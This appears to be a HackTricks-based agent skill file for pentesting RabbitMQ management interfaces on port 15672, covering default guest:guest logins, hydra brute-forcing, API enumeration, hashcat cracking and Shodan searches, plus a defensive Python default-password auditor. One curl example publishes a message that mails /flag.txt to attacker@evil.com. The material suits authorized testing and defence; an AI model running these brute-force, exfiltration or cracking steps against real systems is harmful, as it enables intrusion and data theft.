Hacktricks-skills rabbitmq-pentest

Pentest RabbitMQ Management interfaces on port 15672. Use this skill whenever you need to assess RabbitMQ security, test default credentials, enumerate via the management API, publish messages to queues, or crack RabbitMQ authentication hashes. Trigger this for any RabbitMQ exposure, AMQP service testing, or when you see port 15672 open.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/15672-pentesting-rabbitmq-management/SKILL.MD
source content

RabbitMQ Management Pentesting

This skill helps you assess and exploit RabbitMQ Management interfaces (port 15672) when the management plugin is enabled.

Quick Start

# Check if RabbitMQ Management is exposed
nmap -p 15672 <target>

# Test default credentials
curl -u guest:guest http://<target>:15672/api/overview

Enumeration

1. Check Management Console

The RabbitMQ Management web console runs on port 15672. Access it at:

http://<target>:15672/

2. Test Default Credentials

Default credentials are often unchanged:

  • Username: guest
  • Password: guest

Test with:

curl -u guest:guest http://<target>:15672/api/overview
curl -u guest:guest http://<target>:15672/api/connections

3. Brute-Force Authentication

If defaults fail, try brute-forcing the login form:

# Using hydra (the management port must be given with -s; quote the form string so the shell does not treat & as a job separator)
hydra -L userlist.txt -P passlist.txt -s 15672 <target> http-post-form "/login:username=^USER^&password=^PASS^:F=login"

# Using burp suite or similar tools against the login endpoint

4. API Enumeration

Once authenticated, explore these endpoints:

# Get overview of the RabbitMQ server
curl -u <user>:<pass> http://<target>:15672/api/overview

# List all connections
curl -u <user>:<pass> http://<target>:15672/api/connections

# List all queues
curl -u <user>:<pass> http://<target>:15672/api/queues/%2F

# List all exchanges
curl -u <user>:<pass> http://<target>:15672/api/exchanges/%2F

# List all vhosts
curl -u <user>:<pass> http://<target>:15672/api/vhosts

Exploitation

Publish Messages to Queues

You can publish data to queues via the API. This can be used for:

  • Testing message injection
  • Sending malicious payloads
  • Exfiltrating data through message attachments

# Basic message publishing
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: <target>:15672
Authorization: Basic <base64-credentials>
Accept: */*
Content-Type: application/json;charset=UTF-8

{
  "vhost": "/",
  "name": "amq.default",
  "properties": {
    "delivery_mode": 1,
    "headers": {}
  },
  "routing_key": "<queue-name>",
  "payload": "<your-message>",
  "payload_encoding": "string"
}

Example with file exfiltration attempt:

curl -X POST \
  -u guest:guest \
  -H "Content-Type: application/json" \
  -d '{
    "vhost":"/",
    "name":"amq.default",
    "properties":{"delivery_mode":1,"headers":{}},
    "routing_key":"email",
    "payload":"{\"to\":\"attacker@evil.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}",
    "headers":{},
    "props":{},
    "payload_encoding":"string"
  }' \
  http://<target>:15672/api/exchanges/%2F/amq.default/publish

Hash Cracking

If you capture RabbitMQ authentication hashes, crack them:

# Decode and format the hash: the stored value is base64(salt || SHA256(salt || password)),
# with a 4-byte salt (8 hex chars) in front; hashcat mode 1420 expects hash:salt
echo <base64-rabbitmq-hash> | base64 -d | xxd -p -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt

# Crack with hashcat (mode 1420 = RabbitMQ 3.x)
hashcat -m 1420 --hex-salt hash.txt /path/to/wordlist.txt
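
The same salt-prefixed SHA-256 format can be checked directly, which is what a defender wants when auditing an exported definitions file (the `/api/definitions` export, not shown on this page) for accounts still set to the default password. The Python below is an added example, not part of the HackTricks skill; the `SAMPLE_DEFINITIONS` users and their hashes are constructed so it runs offline.

```python
import base64
import hashlib
import hmac
import secrets


def rabbit_hash(password, salt=None):
    """Build a RabbitMQ password_hash: base64(salt || SHA256(salt || password)).
    This is the rabbit_password_hashing_sha256 scheme with a 4-byte random salt."""
    if salt is None:
        salt = secrets.token_bytes(4)
    digest = hashlib.sha256(salt + password.encode("utf-8")).digest()
    return base64.b64encode(salt + digest).decode("ascii")


def verify_rabbit_hash(password, password_hash):
    """Check a candidate password against a stored hash (salt is the first 4 bytes)."""
    raw = base64.b64decode(password_hash)
    salt, stored = raw[:4], raw[4:]
    computed = hashlib.sha256(salt + password.encode("utf-8")).digest()
    return hmac.compare_digest(computed, stored)


def to_hashcat_1420(password_hash):
    """Same transformation as the shell pipeline above: hex(hash):hex(salt)."""
    raw = base64.b64decode(password_hash)
    return f"{raw[4:].hex()}:{raw[:4].hex()}"


DEFAULT_PASSWORDS = ["guest"]  # vendor default; extend with your own policy list


def find_default_password_users(definitions):
    """Return names of users whose hash verifies against a known default password."""
    flagged = []
    for user in definitions.get("users", []):
        algo = user.get("hashing_algorithm", "rabbit_password_hashing_sha256")
        if algo != "rabbit_password_hashing_sha256":
            continue  # only the SHA-256 scheme is handled here
        if any(verify_rabbit_hash(p, user["password_hash"]) for p in DEFAULT_PASSWORDS):
            flagged.append(user["name"])
    return flagged


# Constructed sample in the shape of the "users" array of a definitions export
SAMPLE_DEFINITIONS = {"users": [
    {"name": "guest", "password_hash": rabbit_hash("guest", b"\x01\x02\x03\x04"),
     "hashing_algorithm": "rabbit_password_hashing_sha256", "tags": ["administrator"]},
    {"name": "svc_orders", "password_hash": rabbit_hash("c0rrect-h0rse-b@ttery"),
     "hashing_algorithm": "rabbit_password_hashing_sha256", "tags": []},
]}

if __name__ == "__main__":
    print(find_default_password_users(SAMPLE_DEFINITIONS))  # ['guest']
```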

Post-Exploitation

Enable Management Plugin (if you have shell access)

rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart

Reconnaissance via Shodan

Find exposed RabbitMQ instances:

shodan search "port:15672 http"

Common Vulnerabilities

  1. Default credentials - guest:guest is often unchanged
  2. Unauthenticated API access - some endpoints may not require auth
  3. Message injection - publishing arbitrary messages to queues
  4. Information disclosure - API reveals internal topology
  5. Weak authentication - susceptible to brute-force attacks

Testing Checklist

  • Port 15672 is open and accessible
  • Test default credentials (guest:guest)
  • Attempt brute-force if defaults fail
  • Enumerate via API endpoints
  • Check for message injection capabilities
  • Capture and crack any authentication hashes
  • Document all findings

Notes

  • RabbitMQ Management requires the rabbitmq_management plugin to be enabled
  • The management interface is typically bound to localhost by default - check if it's exposed externally
  • Always have proper authorization before testing
  • Document your findings for the client